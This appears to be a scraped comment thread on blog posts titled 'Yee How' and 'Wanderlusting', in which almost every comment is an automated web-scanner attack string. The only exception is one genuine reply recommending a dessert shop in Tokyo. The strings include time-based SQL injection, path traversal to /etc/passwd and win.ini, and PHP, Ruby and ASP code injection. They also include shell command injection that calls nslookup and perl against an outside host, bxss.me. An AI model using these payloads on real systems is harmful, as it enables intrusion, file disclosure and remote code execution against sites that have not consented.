".gethostbyname(lc("hitje"."vuxrtyti0efaf.bxss.me."))."A".chr(67).chr(hex("58")).chr(102).chr(82).chr(104).chr(89)."
re: Yee How
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Yee How
/\../\../\../\../\../\../\../etc/passwd
re: Yee How
Http://bxss.me/t/fit.txt
re: Yee How
/WEB-INF/web.xml
re: Yee How
http://bxss.me/t/fit.txt%3F.jpg
re: Yee How
C:\WINDOWS\system32\drivers\etc\hosts
re: Yee How
../../../../../../../../../../windows/win.ini%00.jpg
re: Yee How
/etc/shells
re: Yee How
/../../../../../../../../../../boot.ini
re: Yee How
c:/windows/win.ini
re: Yee How
HttP://bxss.me/t/xss.html?%00
re: Yee How
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Yee How
bxss.me
re: Yee How
"+"A".concat(70-3).concat(22*4).concat(117).concat(65).concat(119).concat(65)+(require"socket"
Socket.gethostbyname("hitxw"+"ljxqfxzj3e98f.bxss.me.")[3].to_s)+"
re: Yee How
bxss.me/t/xss.html?%00
re: Yee How
..\..\..\..\..\..\..\..\windows\win.ini
re: Yee How
'+'A'.concat(70-3).concat(22*4).concat(110).concat(72).concat(103).concat(82)+(require'socket'
Socket.gethostbyname('hitzy'+'lkbkvfuc749b5.bxss.me.')[3].to_s)+'
re: Yee How
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Yee How
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Yee How
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Yee How
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Yee How
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Yee How
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Yee How
';print(md5(31337));$a='
re: Yee How
";print(md5(31337));$a="
re: Yee How
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Yee How
'"
re: Yee How
${@print(md5(31337))}
re: Yee How
WEB-INF/web.xml
re: Yee How
<!--
re: Yee How
${@print(md5(31337))}\
re: Yee How
WEB-INF\web.xml
re: Yee How
'.print(md5(31337)).'
re: Yee How
1
re: Yee How
1
re: Yee How
-1 OR 2+920-920-1=0+0+0+1 --
re: Yee How
-1 OR 3+920-920-1=0+0+0+1 --
re: Yee How
-1 OR 2+120-120-1=0+0+0+1
re: Yee How
-1 OR 3+120-120-1=0+0+0+1
re: Yee How
-1' OR 2+165-165-1=0+0+0+1 --
re: Yee How
-1' OR 3+165-165-1=0+0+0+1 --
re: Yee How
-1' OR 2+496-496-1=0+0+0+1 or 'D2tfGEZt'='
re: Yee How
-1' OR 3+496-496-1=0+0+0+1 or 'D2tfGEZt'='
re: Yee How
-1" OR 2+650-650-1=0+0+0+1 --
re: Yee How
-1" OR 3+650-650-1=0+0+0+1 --
re: Yee How
if(now()=sysdate(),sleep(15),0)
re: Yee How
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Yee How
-1; waitfor delay '0:0:15' --
re: Yee How
-1); waitfor delay '0:0:15' --
re: Yee How
1 waitfor delay '0:0:15' --
re: Yee How
1kGSqSpo'; waitfor delay '0:0:15' --
re: Yee How
-5 OR 811=(SELECT 811 FROM PG_SLEEP(15))--
re: Yee How
-5) OR 883=(SELECT 883 FROM PG_SLEEP(15))--
re: Yee How
-1)) OR 656=(SELECT 656 FROM PG_SLEEP(15))--
re: Yee How
qF7C4Bkf' OR 23=(SELECT 23 FROM PG_SLEEP(15))--
re: Yee How
hHHJ2aLr') OR 492=(SELECT 492 FROM PG_SLEEP(15))--
re: Yee How
yyWXrYX0')) OR 581=(SELECT 581 FROM PG_SLEEP(15))--
re: Yee How
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Yee How
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Yee How
'||(select 1 from (select pg_sleep(15))x)||'
re: Yee How
''||(select 1 from (select pg_sleep(15))x)||''
re: Yee How
1'"
re: Yee How
@@a0z3y
I'm not really a dessert person so take my recommendation with a grain of salt. Ungrain in Minamiaoyama, I went once and its a nice little shop, need to book a session before you visit. Think they have different offerings with seasonal ingredients.
re: Wanderlusting
8umTU96i
re: Wanderlusting
1*
re: Wanderlusting
1*
re: Wanderlusting
1*
re: Wanderlusting
1*
re: Wanderlusting
-1 OR 2+428-428-1=0+0+0+1
re: Wanderlusting
-1 OR 3+428-428-1=0+0+0+1
re: Wanderlusting
if(now()=sysdate(),sleep(15),0)
re: Wanderlusting
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Wanderlusting
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Wanderlusting
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Wanderlusting
-1; waitfor delay '0:0:15' --
re: Wanderlusting
-1); waitfor delay '0:0:15' --
re: Wanderlusting
1 waitfor delay '0:0:15' --
re: Wanderlusting
nm82qRvg'; waitfor delay '0:0:15' --
re: Wanderlusting
-5 OR 297=(SELECT 297 FROM PG_SLEEP(15))--
re: Wanderlusting
-5) OR 377=(SELECT 377 FROM PG_SLEEP(15))--
re: Wanderlusting
-1)) OR 976=(SELECT 976 FROM PG_SLEEP(15))--
re: Wanderlusting
OLZjhiVE' OR 747=(SELECT 747 FROM PG_SLEEP(15))--
re: Wanderlusting
rSeD4opN') OR 696=(SELECT 696 FROM PG_SLEEP(15))--
re: Wanderlusting
U8DXSnn2')) OR 172=(SELECT 172 FROM PG_SLEEP(15))--
re: Wanderlusting
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Wanderlusting
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Wanderlusting
'||(select 1 from (select pg_sleep(15))x)||'
re: Wanderlusting
''||(select 1 from (select pg_sleep(15))x)||''
re: Wanderlusting
1'"
re: Wanderlusting
@@SFeT7
re: Wanderlusting
1CormpZAB6O
re: Wanderlusting
response.write(9338255*9046587)
re: Wanderlusting
'+response.write(9338255*9046587)+'
re: Wanderlusting
"+response.write(9338255*9046587)+"
re: Wanderlusting
%0abcc:074625.67-19860.67.14eb7.19990.2@bxss.me
re: Wanderlusting
to@example.com>%0d%0abcc:074625.67-19861.67.14eb7.19990.2@bxss.me
re: Wanderlusting
<esi:include src="http://bxss.me/rpb.png"/>
re: Wanderlusting
${9999991+10000061}
re: Wanderlusting
../../../../../../../../../../../../../../etc/passwd
re: Wanderlusting
../../../../../../../../../../../../../../windows/win.ini
re: Wanderlusting
file:///etc/passwd
re: Wanderlusting
../../../../../../../../../../../../../../../proc/version
re: Wanderlusting
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Wanderlusting
../../../../../../../../../../etc/passwd%00.jpg
re: Wanderlusting
)
re: Wanderlusting
echo satdtr$()\ vpyhep\nz^xyu||a #' &echo satdtr$()\ vpyhep\nz^xyu||a #|" &echo satdtr$()\ vpyhep\nz^xyu||a #
re: Wanderlusting
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Wanderlusting
'.gethostbyname(lc('hitif'.'zwliqjnx1bc95.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(88).chr(101).chr(87).'
re: Wanderlusting
!(()&&!|*|*|
re: Wanderlusting
&echo easvgd$()\ natkbf\nz^xyu||a #' &echo easvgd$()\ natkbf\nz^xyu||a #|" &echo easvgd$()\ natkbf\nz^xyu||a #
re: Wanderlusting
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Wanderlusting
".gethostbyname(lc("hitwn"."ipclwtxe07216.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(65).chr(108).chr(83)."
re: Wanderlusting
^(#$!@#$)(()))******
re: Wanderlusting
|echo xvkavf$()\ aanolq\nz^xyu||a #' |echo xvkavf$()\ aanolq\nz^xyu||a #|" |echo xvkavf$()\ aanolq\nz^xyu||a #
re: Wanderlusting
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Wanderlusting
(nslookup hitybspifmgtgc883e.bxss.me||perl -e "gethostbyname('hitybspifmgtgc883e.bxss.me')")
re: Wanderlusting
/etc/passwd
re: Wanderlusting
$(nslookup hitrxgnxkjpwbaf0e4.bxss.me||perl -e "gethostbyname('hitrxgnxkjpwbaf0e4.bxss.me')")
re: Wanderlusting
%2fetc%2fpasswd
re: Wanderlusting
&nslookup hituqheczqvnoe6d91.bxss.me&'\"`0&nslookup hituqheczqvnoe6d91.bxss.me&`'
re: Wanderlusting
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Wanderlusting
&(nslookup hitivfuzdluux40a80.bxss.me||perl -e "gethostbyname('hitivfuzdluux40a80.bxss.me')")&'\"`0&(nslookup hitivfuzdluux40a80.bxss.me||perl -e "gethostbyname('hitivfuzdluux40a80.bxss.me')")&`'
re: Wanderlusting
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Wanderlusting
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Wanderlusting
|(nslookup hitqhitjjckvqf070d.bxss.me||perl -e "gethostbyname('hitqhitjjckvqf070d.bxss.me')")
re: Wanderlusting
HttP://bxss.me/t/xss.html?%00
re: Wanderlusting
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Wanderlusting
"+"A".concat(70-3).concat(22*4).concat(117).concat(84).concat(119).concat(75)+(require"socket"
Socket.gethostbyname("hitdb"+"ateuvqat2576c.bxss.me.")[3].to_s)+"
re: Wanderlusting
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Wanderlusting
`(nslookup hitlbphyuvbrgc6b2d.bxss.me||perl -e "gethostbyname('hitlbphyuvbrgc6b2d.bxss.me')")`
re: Wanderlusting
bxss.me/t/xss.html?%00
re: Wanderlusting
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Wanderlusting
'+'A'.concat(70-3).concat(22*4).concat(103).concat(70).concat(107).concat(87)+(require'socket'
Socket.gethostbyname('hitkh'+'hlmcfjjn7c9bb.bxss.me.')[3].to_s)+'
re: Wanderlusting
Http://bxss.me/t/fit.txt
re: Wanderlusting
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Wanderlusting
;(nslookup hitpmyktnlgsc8351a.bxss.me||perl -e "gethostbyname('hitpmyktnlgsc8351a.bxss.me')")|(nslookup hitpmyktnlgsc8351a.bxss.me||perl -e "gethostbyname('hitpmyktnlgsc8351a.bxss.me')")&(nslookup hitpmyktnlgsc8351a.bxss.me||perl -e "gethostbyname('hitpmyktnlgsc8351a.bxss.me')")
re: Wanderlusting
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Wanderlusting
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Wanderlusting
http://bxss.me/t/fit.txt%3F.jpg
re: Wanderlusting
';print(md5(31337));$a='
re: Wanderlusting
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Wanderlusting
/etc/shells
re: Wanderlusting
";print(md5(31337));$a="
re: Wanderlusting
file:///etc/passwd
re: Wanderlusting
c:/windows/win.ini
re: Wanderlusting
${@print(md5(31337))}
re: Wanderlusting
/\../\../\../\../\../\../\../etc/passwd
re: Wanderlusting
bxss.me
re: Wanderlusting
'"
re: Wanderlusting
${@print(md5(31337))}\
re: Wanderlusting
/WEB-INF/web.xml
re: Wanderlusting
'.print(md5(31337)).'
re: Wanderlusting
<!--
re: Wanderlusting
C:\WINDOWS\system32\drivers\etc\hosts
re: Wanderlusting
../../../../../../../../../../windows/win.ini%00.jpg
re: Wanderlusting
/../../../../../../../../../../boot.ini
re: Wanderlusting
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Wanderlusting
..\..\..\..\..\..\..\..\windows\win.ini
re: Wanderlusting
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Wanderlusting
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Wanderlusting
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Wanderlusting
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Wanderlusting
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\